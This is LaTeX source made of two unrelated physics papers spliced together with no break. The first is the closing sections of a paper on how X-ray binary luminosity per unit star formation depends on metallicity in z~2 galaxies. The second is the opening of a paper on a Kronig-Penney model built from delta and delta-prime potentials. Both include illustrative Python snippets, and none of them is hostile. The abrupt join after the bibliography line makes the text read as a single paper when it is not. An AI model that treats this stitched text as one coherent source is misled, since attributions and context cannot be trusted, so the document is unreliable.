The sSFR range of the galaxies in the stacks shown in Figure \ref{fig:lxsfrdiff} was restricted so that the $\langle \mathrm{sSFR} \rangle$ of the different stacks varies by $<0.2$ dex. As discussed in \S\ref{sec:zdep}, we found it is important to try to match the sSFR distribution between the different $Z$ stacks as much as possible to control for the sSFR-dependent LMXB contribution. Since the typical SFRs of the galaxies in our sample vary depending on the SFR indicator, the common sSFR range we adopt also depends on the SFR indicator. The log(sSFR/yr$^{-1}$) ranges are $-9.2$ to $-8.4$ for the $Z=0.02$ H$\alpha$ SFRs, $-9.35$ to $-8.55$ for the $Z=0.004$ H$\alpha$ SFRs, $-9.05$ to $-8.5$ for the $Z=0.02$ SED SFRs with the \citet{calzetti00} extinction curve, and $-9.5$ to $-8.9$ for the $Z=0.004$ SED SFRs with the SMC extinction curve. \par
For each SFR indicator, we calculate the probability that the stacked $L_{\mathrm{X}}$/SFR is anti-correlated with $Z$. Assuming a power-law relationship between $L_{\mathrm{X}}$/SFR and $Z$, for all SFR indicators, we find that a negative power-law index is favored over an index $\geq 0$. A negative correlation is favored with 83\% and 84\% probability when using the H$\alpha$-derived SFRs with $Z=0.02$ and $Z=0.004$, respectively, and with 99.4\% and 74\% probability when using SED-derived SFRs with $Z=0.02$ and $Z=0.004$, respectively. Thus, the data suggest an anti-correlation between the $L_{\mathrm{X}}$/SFR of XRBs and $Z$ at $z\sim2$ regardless of SFR indicator, but the choice of SFR indicator does impact the significance of this result. \par
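Probabilities of this kind can be approximated with a simple Monte Carlo over the stacked measurements. The sketch below is purely illustrative: the abundances, $L_{\mathrm{X}}$/SFR values, and error bars are invented, and independent Gaussian uncertainties on log($L_{\mathrm{X}}$/SFR) are assumed.

```python
import numpy as np

rng = np.random.default_rng(0)

# Illustrative stacked values (hypothetical, for demonstration only):
# 12+log(O/H) of each stack and log(L_X/SFR) with 1-sigma errors.
logOH = np.array([8.2, 8.4, 8.6])
logLxSFR = np.array([40.1, 39.9, 39.7])
err = np.array([0.15, 0.12, 0.18])

# Draw Monte Carlo realisations of the three stacks and fit a straight
# line (a power law in the linear quantities) to each realisation.
n_mc = 20000
draws = rng.normal(logLxSFR, err, size=(n_mc, logOH.size))
slopes = np.polyfit(logOH, draws.T, 1)[0]

# Fraction of realisations with a negative slope = probability of an
# anti-correlation between L_X/SFR and Z under these assumptions.
p_anticorr = np.mean(slopes < 0.0)
print(f"P(slope < 0) = {p_anticorr:.3f}")
```

An actual analysis would replace the invented numbers with the measured stack values and their (possibly asymmetric) uncertainties.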
For each SFR indicator, we also calculate the high sSFR stacks as described in \S\ref{sec:hmxb}. We find that, except for the stacks based on the SED-derived SFRs with $Z=0.004$, all the high sSFR stacks are in good agreement with the local $L_{\mathrm{X}}$-SFR-$Z$ relation from \citetalias{brorby16}, and they are inconsistent at $>99\%$ confidence with the \citetalias{madau17} model and the upper $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} models. In particular, these results are not affected by the $L_{\mathrm{H}\alpha}$-SFR conversion factor assumed. The H$\alpha$ SFRs likely provide the most reliable comparison for the local $L_{\mathrm{X}}$-SFR-$Z$ relation, because the \citetalias{brorby16}, \citetalias{mineo12}, and \citetalias{lehmer10} local measurements are based on UV+IR SFRs and the H$\alpha$ SFRs are in good agreement with UV+IR SFRs for the MOSDEF sample \citep{shivaei16}. Thus, the conclusion that the redshift evolution of $L_{\mathrm{X}}$/SFR for high sSFR galaxies is driven by the $Z$ dependence of HMXBs is fairly robust to the choice of SFR indicator.
\subsection{Other systematic effects}
\label{sec:systematics}
We investigate other sources of systematic uncertainty and their possible impact on our results.
\subsubsection{Contamination from unidentified AGN}
While we have tried to screen out AGN as much as possible with multi-wavelength selection criteria, contamination from low-luminosity AGN remains a source of uncertainty. \citet{fornasini18} find that even when luminous ($L_{\mathrm{X}}\gtrsim10^{42}-10^{43}$ erg s$^{-1}$) AGN are excluded, there is evidence for obscured, low-luminosity AGN with $\langle L_{\mathrm{X}} \rangle\approx10^{41}-10^{42}$ erg s$^{-1}$ in X-ray stacks of star-forming galaxies at $z\sim1-2$. To gain some insight into how unidentified AGN may be influencing our results, we test how relaxing our AGN exclusion criteria impacts our stacks. We experimented with adding identified optical, IR, or X-ray AGN, as well as all identified AGN, to our stacks. At most, this expands our galaxy sample by 34 galaxies and increases the $\langle L_{\mathrm{X}} \rangle$ of the middle-$Z$ and high-$Z$ stacks by 0.1 dex (the change in $\langle L_{\mathrm{X}} \rangle$ of the low-$Z$ stack is $<0.5$ dex). While the resulting $L_{\mathrm{X}}$/SFR values of the stacks remain consistent within 1$\sigma$ statistical uncertainties, the inclusion of known AGN tends to flatten the observed $Z$ dependence. The fact that $\langle L_{\mathrm{X}} \rangle$ does not significantly increase when galaxies above the \citet{kauffmann03} line are included in the X-ray stacks is consistent with observations that many normal star-forming galaxies at $z\sim2$ can lie above this line due to enhanced nebular N/O or stellar $\alpha$ enhancement, as compared with the ionized gas and massive stars in galaxies at $z=0$ (\citealt{masters14}; \citealt{shapley15}; \citealt{sanders16a}; \citealt{steidel16}). 
The comparison of $L_{\mathrm{X}}$/SFR of stacks with and without identified AGN suggests that contamination from unidentified, low-luminosity AGN is unlikely to significantly impact the measured $L_{\mathrm{X}}$/SFR; if unidentified AGN have any impact at all, this comparison implies that the true HMXB-driven relation between $L_{\mathrm{X}}$/SFR and $Z$ may be even steeper than that observed. Thus, the possibility of AGN contamination does not meaningfully impact our conclusions.
\subsubsection{X-ray spectrum}
Another source of systematic uncertainty is the X-ray spectrum. While our stacks do not have sufficient net counts for spectral fitting, hardness ratios can provide rough constraints on the spectrum. For each stack, we calculated the hardness ratio based on the net counts in the $0.5-2$ keV (soft, S) and $2-7$ keV (hard, H) bands using the Bayesian estimation code BEHR \citep{park06}, which is designed for low count statistics. The hardness ratio is defined as $(H-S)/(H+S)$. Figure \ref{fig:hratio} shows the hardness ratio of stacks \#4-6 (the hardness ratios of the other stacks are very similar). As can be seen, these hardness ratios are consistent with relatively unobscured ($N_{\mathrm{H}}\lesssim10^{22}$ cm$^{-2}$) spectra with a photon index of $\Gamma=1.4-2.5$, and our adopted spectral model (unobscured, $\Gamma=2$ power-law) falls within this range. Varying the spectral parameters within the allowed ranges results in $\pm 0.15$ dex variations in the stacked $L_{\mathrm{X}}$, which is comparable to the statistical uncertainties; thus, the general agreement of our stacks with the \citetalias{fragos13b} model and the local relation is not substantially affected by spectral variations. Changing the spectral parameters affects all stacks by the same logarithmic amount, so the relative differences between the stacks remain unchanged.
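The hardness-ratio definition used here is straightforward to evaluate; the sketch below propagates Poisson counting noise by brute-force Monte Carlo using invented count values, as a crude stand-in for BEHR (which additionally handles background subtraction and very low counts properly).

```python
import numpy as np

rng = np.random.default_rng(1)

def hardness_ratio(soft, hard):
    """Hardness ratio (H - S) / (H + S) from net band counts."""
    return (hard - soft) / (hard + soft)

# Illustrative net counts in the soft (0.5-2 keV) and hard (2-7 keV) bands.
S_obs, H_obs = 30.0, 18.0
print("HR =", hardness_ratio(S_obs, H_obs))

# Crude Poisson Monte Carlo for the uncertainty on the hardness ratio.
S_mc = rng.poisson(S_obs, 50000)
H_mc = rng.poisson(H_obs, 50000)
ok = (S_mc + H_mc) > 0
hr_mc = hardness_ratio(S_mc[ok].astype(float), H_mc[ok].astype(float))
print(f"HR = {hr_mc.mean():.2f} +/- {hr_mc.std():.2f}")
```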
\begin{figure}
\centering
\includegraphics[width=0.5\textwidth]{HRvsz_nosigcut_linz_Zdiv.ps}
\vspace{0.25in}
\caption{Hardness ratios of the three stacks based on the full sample versus weighted average redshift of the stack. Blue lines show the expected hardness ratios for sources with absorbed power-law spectra; line color represents different $\Gamma$ while line style represent different column densities ($N_{\mathrm{H}}$). Our stacks are consistent with relatively unobscured ($N_{\mathrm{H}}<10^{22}$ cm$^{-2}$) spectra with $\Gamma=1.4-2.5$. }
\label{fig:hratio}
\end{figure}
\subsubsection{Redshift evolution of $Z$ indicator and chemical abundances}
Even though we use the same $Z$ indicator as \citet{brorby16} to facilitate the comparison of the MOSDEF $z\sim2$ stacks with the local $L_{\mathrm{X}}$-SFR-$Z$ relation, it remains debated how O3N2 (and other $Z$ indicators) may evolve with redshift. Studies of emission line ratios at $z\sim2$ find that the N2 indicator overestimates the gas-phase O/H due to either elevated N/O or a harder stellar ionizing spectrum at fixed O/H (\citealt{masters14}; \citealt{shapley15}; \citealt{steidel16}). While these factors may also affect the O3N2 indicator, \citeauthor{steidel14} (\citeyear{steidel14}; \citeyear{steidel16}) present evidence that the O3N2 indicator is not significantly biased. While oxygen-based indicators such as O$_{32}$ or R$_{23}$ are increasingly considered more reliable than indicators that include nitrogen (\citealt{shapley15}; \citealt{sanders16a}; \citealt{sanders16b}), adopting one of these indicators would decrease our sample size even further. Furthermore, O$_{32}$ and R$_{23}$ are more impacted by reddening \citep{sanders18}. Comparing the oxygen abundances derived using O3N2 and O$_{32}$ for the subset of MOSDEF galaxies for which both indicators are available, we find that O/H values based on O3N2 are on average 0.13 dex lower than those derived from O$_{32}$. If the $\langle$ O/H $\rangle$ values of our stacks are systematically offset by this amount, they would remain in agreement with the local $L_{\mathrm{X}}$-SFR-$Z$ relation, but some of the tension with the \citetalias{madau17} and upper \citetalias{fragos13b} models would be eased.
\par
Finally, especially when comparing our results to theoretical models, it is important to keep in mind that there may be differences between nebular O/H, which we use as a $Z$ proxy, and stellar metallicity as defined by the \citetalias{fragos13b} and \citetalias{madau17} models. In particular, the chemical abundances in $z\sim2$ galaxies may be different from the solar abundance pattern assumed by the models. The $Z$ dependence of radiatively-driven stellar winds, which is the underlying cause of the $Z$ dependence of $L_{\mathrm{X}}$/SFR in HMXB population synthesis models, primarily depends on the abundance of Fe in the case of solar abundance ratios \citep{vink01}. However, \citet{steidel16} found that $z\sim2$ star-forming galaxies can be highly supersolar in O/Fe, as expected for a gas that is primarily enriched by core collapse supernovae.
Using a small sample of $z\sim2$ galaxies with [O{\small III}]$\lambda4363$ detections, including four MOSDEF galaxies, \citet{sanders19} similarly find that O/Fe is enhanced in the galaxies, but note that neither their sample nor the \citet{steidel16} sample may be representative of $z\sim2$ galaxies. \par
Nonetheless, let us consider the implications if the MOSDEF $z\sim2$ galaxies are typically supersolar in O/Fe. In this case, the line-driven winds of their stellar populations are likely dominated by C, N, and O rather than Fe. While the results of \citet{vink01} suggest that the $Z$ dependence of Fe-driven and CNO-driven winds may be similar, this issue has not been investigated for $Z>0.1 Z_{\odot}$. The \citetalias{fragos13b} and \citetalias{madau17} models we use as a point of comparison, like most current models, assume solar abundance ratios for $Z\gtrsim0.1 Z_{\odot}$, and thus their appropriateness for high redshift stellar populations should be investigated. \par
In summary, none of these systematic effects substantially alter the conclusion that the observed redshift evolution of $L_{\mathrm{X}}$/SFR is consistent with being driven by the $Z$ dependence of HMXBs.
\section{Conclusions}
\label{sec:conclusions}
We have studied the X-ray emission of a sample of 79 star-forming galaxies at $1.37<z<2.61$ in the CANDELS fields with rest-frame optical spectra from the MOSDEF survey in order to investigate the
metallicity dependence of HMXBs at $z\sim2$. While studies of local galaxies have discovered that HMXB populations in low-$Z$ galaxies are more luminous (e.g. \citealt{brorby16}), and the observed increase of $L_{\mathrm{X}}$/SFR with redshift has been attributed to this $Z$ dependence (\citealt{basu13a}; \citealt{lehmer16}), the connection between the redshift evolution and $Z$ dependence of HMXBs has not been directly tested previously.
In order to assess whether the $Z$ dependence of HMXBs can account for the observed increase in $L_{\mathrm{X}}$/SFR as a function of redshift, we (a) tested whether the $L_{\mathrm{X}}$/SFR of HMXBs depends on $Z$ at $z\sim2$ and (b) compared this trend to the local $L_{\mathrm{X}}$-SFR-$Z$ relation.
\par
After removing AGN based on multi-wavelength diagnostics, we stacked the X-ray data of star-forming galaxies from the \textit{Chandra} AEGIS-X Deep survey, the \textit{Chandra} Deep Field North, and the \textit{Chandra} Deep Field South. Investigating how the $L_{\mathrm{X}}$/SFR of our galaxies varies when they are grouped according to redshift, $Z$, and sSFR, we find the following results:
\begin{enumerate}
\item The average $L_{\mathrm{X}}$/SFR of galaxies at $z\sim1.5$ and $z\sim2.3$ is elevated compared to values for local star-forming galaxies (\citealt{lehmer10}; \citealt{mineo12}). This $\approx0.4-0.8$ dex enhancement is comparable to that observed for $z\sim2$ galaxies by previous studies (\citealt{lehmer16}; \citealt{aird17}).
\item Splitting our sample into three metallicity bins, we find that $L_{\mathrm{X}}$/SFR and $Z$ are anti-correlated with 97\% confidence at similar sSFR. This result is based on H$\alpha$-derived SFRs with $Z$-dependent conversion factors, which we consider to be the most reliable SFR indicator available for this galaxy sample. It provides the first evidence for the metallicity dependence of XRB populations at $z>0$. This trend is more likely to be driven by HMXBs than LMXBs, unless $L_{\mathrm{LMXB}}/M_*$ decreases by a factor of $\approx7$ as 12+log(O/H) increases from 8.25 to 8.45. Such large variation would be challenging to explain using current population synthesis models.
\item Stacking only galaxies with high sSFR (sSFR$>1.6\times10^{-9}$ yr$^{-1}$) in order to minimize the contribution from LMXBs, we find that the $L_{\mathrm{X}}$/SFR values of our sample are consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation \citep{brorby16}. Thus, HMXB populations at $z\sim2$ lie on the same $L_{\mathrm{X}}$-SFR-$Z$ relation as galaxies at $z=0$. The high sSFR stacks disagree at $>3\sigma$ confidence with the upper $L_{\mathrm{X}}$/SFR bound of the \citetalias{fragos13b} HMXB models and the best-fit HMXB population synthesis model from \citetalias{madau17}.
\end{enumerate}
The three preceding results combined provide direct evidence that the enhanced $L_{\mathrm{X}}$/SFR of $z\sim2$ star-forming galaxies compared to high sSFR galaxies of similar $M_*$ in the local Universe is due to the lower metallicity of the HMXB populations in high redshift galaxies. This study thus supports the hypothesis of previous works (\citealt{basu13a}; \citealt{lehmer16}) that the observed redshift evolution of $L_{\mathrm{X}}$/SFR is the result of the $Z$ dependence of HMXBs combined with the fact that higher-redshift galaxy samples have lower metallicities on average. \par
By comparing stacks with different sSFR but similar $Z$, we are also able to estimate that the $L_{\mathrm{X}}/M_*$ due to LMXBs is $2-8\times10^{30}$ erg s$^{-1}$ $M_{\odot}^{-1}$ at $z\sim2$. This estimate is an order of magnitude higher than local values (\citealt{gilfanov04}; \citealt{lehmer10}), but consistent with predictions from the \citetalias{fragos13b} and \citetalias{madau17} LMXB population synthesis models. \par
Possible AGN contamination, the assumed X-ray spectrum, and systematics associated with the metallicity measurements do not significantly impact our conclusions. The choice of SFR indicator can substantially affect the absolute $L_{\mathrm{X}}$/SFR values, but the results that $L_{\mathrm{X}}$/SFR varies with $Z$ and that this trend is consistent with the local $L_{\mathrm{X}}$-SFR-$Z$ relation are fairly robust to the choice of SFR indicator.
As our understanding of SFR indicators at high redshift improves, it will be important to revisit these issues. \par
Furthermore, since there is evidence that the stellar populations at $z\sim2$ may have supersolar O/Fe, it is also important to investigate the effect of $\alpha$-element-enhanced abundances on HMXB population synthesis models. Current models assume solar abundance ratios and have not studied the impact of CNO-driven rather than Fe-driven stellar winds on HMXB populations with $Z>0.1Z_{\odot}$.
\par
While our study only probes the metallicity range of 12+log(O/H)$=8.0-8.8$, our results indicate that the \citetalias{brorby16} relation and the \citetalias{fragos13b} models with lower $L_{\mathrm{X}}$/SFR normalizations provide reasonable estimates of the X-ray emission of HMXBs out to high-redshift. Thus, we encourage the adoption of these scaling relations by studies searching for faint X-ray AGN or investigating the effect of X-ray heating on the epoch of reionization.
\par
While this study provides the first direct connection between the redshift evolution and $Z$ dependence of HMXBs, future work is required to improve the statistical significance of this result and to constrain theoretical models of the $Z$ dependence of HMXBs. Larger samples of galaxies with $Z$ measurements are crucial to reduce the statistical uncertainties of the stacked $L_{\mathrm{X}}$. Future thirty-meter-class telescopes will be critical for increasing the number of such measurements at high redshift. Expanding this study to other redshift ranges will also further test
whether the observed redshift evolution is driven by the HMXB $Z$ dependence as found by this study. Furthermore, improving measurements of the local $L_{\mathrm{X}}$-SFR-$Z$ relation by increasing the local galaxy sample size and determining its dependence on additional variables such as sSFR is important as it provides a benchmark for high-redshift studies. \par
With current X-ray instruments, the scatter in the $L_{\mathrm{X}}$-SFR-$Z$ relation can only be studied using nearby galaxy samples, while higher-redshift studies depend on stacking or other statistical techniques. In the future, the \textit{Athena X-ray Observatory} will enable the detection of large samples of individual XRB-dominated galaxies out to $z\sim1$, and the \textit{Lynx X-ray Observatory} would push these detection limits out to $z\sim6$. Combined with accurate $Z$ and SFR measurements from \textit{JWST}, the large samples of individually detected XRB-dominated galaxies provided by these future X-ray missions will enable much more detailed investigations of the multivariate dependence of $L_{\mathrm{XRB}}$ and its scatter on galaxy properties and redshift. These future analyses will help provide stronger constraints on models of stellar evolution, the progenitor channels of gravitational wave sources, and the X-ray heating of the intergalactic medium in the early Universe.
\acknowledgments
We thank G. Fabbiano and M. Elvis for fruitful conversations about this study. FMF and MK acknowledge support from \textit{Chandra} grant 17620679. We acknowledge support from NSF AAG grants AST1312780, 1312547, 1312764, and 1313171, archival grant AR13907 provided by NASA through the Space Telescope Science Institute, and grant NNX16AF54G from the NASA ADAP program. We additionally acknowledge the 3D-HST collaboration for providing spectroscopic and photometric catalogs used in the MOSDEF survey. The scientific results reported in this paper
are based on observations made by the \textit{Chandra X-ray Observatory}. This study also made use of data obtained at the W.M. Keck Observatory, which is operated as a scientific partnership among the California Institute of Technology, the University of California, and the National Aeronautics and Space Administration. The Observatory was made possible by the generous financial support of the W.M. Keck Foundation. We wish to extend special thanks to those of Hawaiian ancestry, on whose sacred mountain we are privileged to be guests. Without their generous hospitality, this work would not have been possible. This study is also based on observations made with the NASA/ESA Hubble Space Telescope, which is operated by the Association of Universities for Research in Astronomy, Inc., under NASA contract NAS 5-26555.
{\large \textit{Software}:} CIAO \citep{fruscione06}, BEHR \citep{park06}
\facilities{Chandra X-ray Observatory, Keck Observatory}
\vspace{5mm}
\bibliographystyle{aasjournal}
In this paper we perform an analysis of a generalised Kronig-Penney model built from $\delta\text{-}\delta'$ potentials. The Kronig-Penney model is a well-known example of a one-dimensional periodic potential used in solid state physics to describe the motion of an electron in a periodic array of rectangular barriers or wells \cite{kronig-prsa31}. One variation of this model is the so-called Dirac comb, in which the rectangular barriers/wells become Dirac delta potentials with positive or negative strength, respectively. The Hamiltonian for the Dirac comb is
\begin{equation}\label{1.1}
{\cal H}= -\frac{\hbar^2}{2m}\,\frac{d^2}{dy^2}+V_1(y), \quad \text{where} \quad
V_1(y)=\mu \sum_{n=-\infty}^\infty \delta(y-n y_0),\quad \mu \in \mathbb{R},\quad y_0>0,
\end{equation}
where both parameters $\mu$ and $y_0$ are fixed.
Dirac delta type potentials are exactly solvable models frequently used to describe quantum systems with very short range interactions which are located around a given point. These two properties make them suitable for obtaining many general properties of realistic quantum systems \cite{textbooks,textbooks2,textbooks3}. Moreover, Dirac delta potentials enable the study of the Bose-Einstein condensation in periodic backgrounds \cite{bordagJPA2019}, in a harmonic trap with a tight and deep ``dimple'' potential, modelled by a Dirac delta function \cite{Uncu}, or a nonperturbative study of the entanglement of two directed polymers subject to repulsive interactions given by a Dirac delta function potential \cite{Ferrari}. It is also interesting to use a Dirac comb to investigate the light propagation (transverse electric and magnetic modes as well as omnidirectional polarization modes) in a one-dimensional relativistic dielectric superlattice \cite{alv-rod-pre99,zur-san-pre99,lin-pre06}. These types of interactions have been used in other contexts such as in studies related with supersymmetry \cite{ignacio1,ignacio2,ignacio3,ignacio4,guilarte-epjp130}.
It is of note that although the rigorous definition of the Dirac delta potential in one dimension is well known, defining a Dirac delta potential supported at a single point in two and three dimensions is highly non-trivial \cite{textbooks3,jackiw,bordag-prd91,bordag-prd95} and requires the use of the theory of self-adjoint extensions to introduce a regularization parameter.
Contact interactions or potentials, also known as zero-range potentials, can be understood as generalisations of the Dirac-$\delta$ potential by means of boundary conditions (see subsection 3.1.1 in Ref. \cite{pistones}). These types of potentials have been widely used in different areas of physics over the past 40 years. Their importance is especially relevant for the applications to atomic physics developed in the 80s (see \cite{zrpap} and references therein). New mathematical tools have been introduced in physics in order to define, characterise and classify rigorously contact potentials \cite{ALB1,AK}. After the seminal papers by Berezin and Faddeev \cite{fad} and Kurasov's paper where contact potentials are characterised by certain self-adjoint extensions of the one-dimensional kinetic operator $K=-d^2/dx^2$ \cite{KUR}, several attempts have been made to explain the physical meaning of the contact potentials that emerge from these extensions \cite{KP,KP1}. More recently, contact potentials have been used to study the effects of resonant tunneling \cite{ZOL,ZOL1}, their properties under the effect of external fields \cite{ZOL2}, and their applications in the study of metamaterials \cite{NIE}. In addition, the effects of several contact potential barriers have been studied in \cite{LUN,KOR,EGU,EGU1,gadella-jpa16,Caudrelier} and extensions to arbitrary dimension have been considered in \cite{MNR}, generalising the approach by Jackiw in \cite{jackiw}. Mathematical properties of potentials decorated with contact interactions have also been the object of recent studies \cite{LAR,ANT,GOL,GOL1,ALB,ET,SPL}. Finally, we would like to mention a wide range of physical applications that have appeared in the last year \cite{KP2,RBO,CAL,JUAN}.
Among these possible generalizations of the Dirac delta potential the most obvious to start with is the derivative of the Dirac delta, usually denoted as $\delta'(y)$. In fact, this interaction has already been considered by several authors in the past \cite{textbooks3,SE,FAS,bawa}. In combination with the Dirac delta produces a potential of the form
\begin{equation}\label{1.2}
V_2(y)= \mu\,\delta(y)+\lambda\,\delta'(y),
\end{equation}
where $\mu$ and $\lambda$ are two arbitrarily fixed real numbers. The potential \eqref{1.2} is given by the self-adjoint extension of the operator $${\cal H}_0=-\frac{\hbar^2}{2m}\frac{d^2}{dy^2}$$ defined over $\mathbb{R}\setminus\{0\}$ by the matching conditions
\begin{equation}
\left(
\begin{array}{c}
\psi (0^+) \\ [1ex]
\psi' (0^+)
\end{array}
\right)=\left(
\begin{array}{cc}
\displaystyle\frac{\hbar^2-m\lambda}{\hbar^2+m\lambda} & 0 \\ [2ex]
\displaystyle \frac{-2\hbar^2m\mu}{\hbar^4-m^2\lambda^2} & \displaystyle \frac{\hbar^2+m\lambda}{\hbar^2-m\lambda}
\end{array}
\right)
\left(
\begin{array}{c}
\psi (0^-) \\ [1ex]
\psi' (0^-)
\end{array}
\right),
\end{equation}
where we denote by $f(y_0^\pm)$ the limit of the function $f(y)$ when $y$ tends to $y_0$ from the left ($y_0^-$) and from the right ($y_0^+$).
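The scattering amplitudes generated by these matching conditions follow from the plane-wave ansatz $\psi=e^{iky}+r\,e^{-iky}$ for $y<0$ and $\psi=t\,e^{iky}$ for $y>0$, which turns the matching conditions into a $2\times2$ linear system for $(t,r)$. A minimal numerical sketch (setting $\hbar=m=1$ for brevity, so that the matrix entries reduce to $(1\mp\lambda)/(1\pm\lambda)$ and $-2\mu/(1-\lambda^2)$) is:

```python
import numpy as np

def scattering_amplitudes(k, mu, lam):
    """Solve the delta-delta' matching conditions (hbar = m = 1) for t and r."""
    # Matching matrix: (psi, psi')(0+) = T (psi, psi')(0-).
    T = np.array([[(1 - lam) / (1 + lam), 0.0],
                  [-2 * mu / (1 - lam**2), (1 + lam) / (1 - lam)]])
    # Left of the origin: psi = exp(iky) + r exp(-iky); right: psi = t exp(iky).
    # The two matching equations, linear in (t, r):
    #   t    = T00 (1 + r) + T01 ik (1 - r)
    #   ik t = T10 (1 + r) + T11 ik (1 - r)
    A = np.array([[1.0, -(T[0, 0] - 1j * k * T[0, 1])],
                  [1j * k, -(T[1, 0] - 1j * k * T[1, 1])]])
    b = np.array([T[0, 0] + 1j * k * T[0, 1],
                  T[1, 0] + 1j * k * T[1, 1]])
    t, r = np.linalg.solve(A, b)
    return t, r

t, r = scattering_amplitudes(k=1.0, mu=0.5, lam=0.3)
print(abs(t)**2 + abs(r)**2)   # ~ 1 (probability conservation)
```

Since the matching matrix is real with unit determinant, the probability current is conserved across the origin, and $|t|^2+|r|^2=1$ follows automatically.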
This potential was studied in \cite{GNN} and has been shown to be relevant in physics. In fact, Mu\~noz-Casta\~neda and Mateos-Guilarte \cite{JMG} had the idea to use a slight generalization of \eqref{1.2} given by
\begin{equation}\label{1.3}
V_{3}(y)=\mu_1 \delta(y+\ell/2)+\lambda_1 \delta'(y+\ell/2)+\mu_2 \delta(y-\ell/2)+\lambda_2 \delta'(y-\ell/2),
\end{equation}
to mimic the physical properties of two infinitely thin plates with an orthogonal polarization interacting with a scalar quantum field. They evaluated the quantum vacuum interaction energy between the two plates and they found positive, negative, and zero Casimir energies depending on the zone in the space of couplings. This study was continued in \cite{gadella-jpa16}, finding new interesting results. For instance, when the limit $\ell\to 0$ is taken in \eqref{1.3}, the resulting potential supported at $x=0$ is a $\delta\text{-}\delta'$ potential with couplings given as functions of $\{\mu_1, \lambda_1,\mu_2,\lambda_2\}$, that defines a non-abelian superposition law.
All these results justify the use of a derivative of the delta interaction alongside the delta itself. In the present paper, we study the properties of the one-dimensional periodic Hamiltonian
\begin{equation}\label{1.4}
{\cal H}= -\frac{\hbar^2}{2m}\,\frac{d^2}{dy^2}+V(y), \quad \text{where} \quad
V(y)=\sum_{n=-\infty}^\infty [\mu\,\delta(y-ny_0)+\lambda\,\delta'(y-ny_0)],
\end{equation}
where again $\mu$ and $\lambda$ are real numbers and $\ell>0$. As usual, the time independent Schr\"odinger equation for this situation should be written as
\begin{equation}\label{1.5}
{\cal H}\psi(y)\equiv -\frac{\hbar^2}{2m}\,\frac{d^2}{dy^2}\,\psi(y)+V(y)\psi(y)={\cal E}\psi(y).
\end{equation}
In order to simplify expressions and calculations, it is usual to work with dimensionless quantities. To this end, we use a redefinition of some magnitudes as was done in \cite{gadella-jpa16}. We perform this redefinition in three steps:
\begin{enumerate}
\item
Magnitudes with the dimensions of a length are compared to the Compton wavelength:
\begin{equation}\label{1.6}
{\rm length\, magnitude}=\frac{\hbar}{mc}\cdot {\rm dimensionless\, magnitude} .
\end{equation}
This allows us to introduce a dimensionless space coordinate on the line, $x=y mc/\hbar$, as well as a dimensionless linear chain spacing $a=y_0 mc/\hbar$.
\item
The Dirac delta coupling $\mu$ has dimensions $[\mu]=ML^3T^{-2}$ and the Dirac $\delta^\prime$ coupling has dimensions $[\lambda]=ML^4T^{-2}$. Hence we can introduce two dimensionless couplings $w_0$ and $w_1$ for the $\delta$ and the $\delta^\prime$ respectively, given by
\begin{equation}\label{1.7}
\mu = \frac{\hbar c}{2} w_0,\qquad \lambda =\frac{\hbar^2}{m} w_1\,.
\end{equation}
\item
Energies are scaled in terms of $mc^2/2$, so that from \eqref{1.4} the rescaled Hamiltonian is given by
\begin{equation}\label{1.8}
H= 2 {\cal H}/mc^2=-\frac{d^2}{d x^2}+\sum_{n\in \mathbb{Z}}\left[ w_0\delta(x-n a)+2w_1\delta^\prime(x-na)\right],
\end{equation}
and the eigenenergies of the time independent Schr\"odinger equation
\begin{equation}\label{1.777}
H\psi(x)=\varepsilon\psi(x)
\end{equation}
will be $\varepsilon=2 {\cal E}/mc^2$.
\end{enumerate}
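In the pure Dirac-comb limit $w_1=0$, the Hamiltonian \eqref{1.8} reduces to the textbook Kronig-Penney problem, whose band equation is $\cos(qa)=\cos(ka)+\frac{w_0}{2k}\sin(ka)$. A minimal numerical scan of this condition, in which the allowed bands are the $k$ intervals where the right-hand side lies in $[-1,1]$, might look like:

```python
import numpy as np

def kp_rhs(k, a=1.0, w0=10.0):
    """Right-hand side of cos(q a) = cos(k a) + (w0 / 2k) sin(k a)."""
    return np.cos(k * a) + (w0 / (2.0 * k)) * np.sin(k * a)

# Scan k and keep the values where |rhs| <= 1 (allowed energy bands).
k = np.linspace(1e-4, 12.0, 200000)
allowed = np.abs(kp_rhs(k)) <= 1.0

# Locate the band edges as transitions of the "allowed" mask.
edges = k[np.flatnonzero(np.diff(allowed.astype(int))) + 1]
bands = edges.reshape(-1, 2) if edges.size % 2 == 0 else edges[:-1].reshape(-1, 2)
for lo, hi in bands:
    print(f"band: {lo:.3f} < k < {hi:.3f}  (energy {lo**2:.2f} .. {hi**2:.2f})")
```

For a repulsive comb ($w_0>0$) the upper edge of the $n$-th band sits exactly at $ka=n\pi$, which the scan reproduces to grid precision.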
Notice that when rescaling the arguments of the $\delta$ and the $\delta'$ in \eqref{1.4} as
\begin{equation*}
\delta(y-n y_0)=\frac{1}{y_0}\delta\left(\frac{y}{y_0}-n\right),\quad \delta'\left(y-ny_0\right)=\frac{1}{y_0^2}\delta'\left(\frac{y}{y_0}-n\right),
\end{equation*}
then the scale of energy defined by the strength of the $\delta'$ coupling is $\lambda/y_0^2$, and the scale of energy defined by the strength of the Dirac-$\delta$ is $\mu/y_0$. It is easy to see that the ratio between both energy scales defined by the strength of the couplings can be written in terms of the Compton wavelength of the particle $\lambda^C=\hbar/(mc)$ and the linear lattice spacing $y_0$ as
\begin{equation}
\frac{\lambda}{\mu y_0}=\frac{2\lambda^C}{y_0}\frac{w_1}{w_0}.
\end{equation}
Typically, the lattice spacings in real crystals are of the order of $y_0\sim \si{\angstrom}$ and the Compton wavelength for an electron is $\lambda^C_{e^-}=3.86\cdot10^{-3}\si{\angstrom}$. Hence $\lambda/(\mu y_0)\sim 10^{-3}\frac{w_1}{w_0}$, meaning that $w_1$ should be much bigger than $w_0$ for the two energy scales to be comparable.
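This numerical estimate is a one-line computation; as a quick check (the only inputs are the electron mass and an assumed lattice spacing of $1\,\si{\angstrom}$):

```python
# Ratio of the delta'-to-delta energy scales,
# lambda/(mu*y0) = (2*lambda_C/y0)*(w1/w0), for an electron with y0 = 1 Angstrom.
hbar = 1.054571817e-34   # J s
m_e = 9.1093837015e-31   # kg
c = 2.99792458e8         # m/s

lambda_C = hbar / (m_e * c)      # reduced Compton wavelength, m
y0 = 1.0e-10                     # lattice spacing, m

prefactor = 2.0 * lambda_C / y0  # multiplies w1/w0
print(f"lambda_C = {lambda_C / 1e-10:.2e} Angstrom")
print(f"lambda/(mu*y0) = {prefactor:.2e} * (w1/w0)")
```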
In the sequel, we shall always work with dimensionless quantities as defined above.
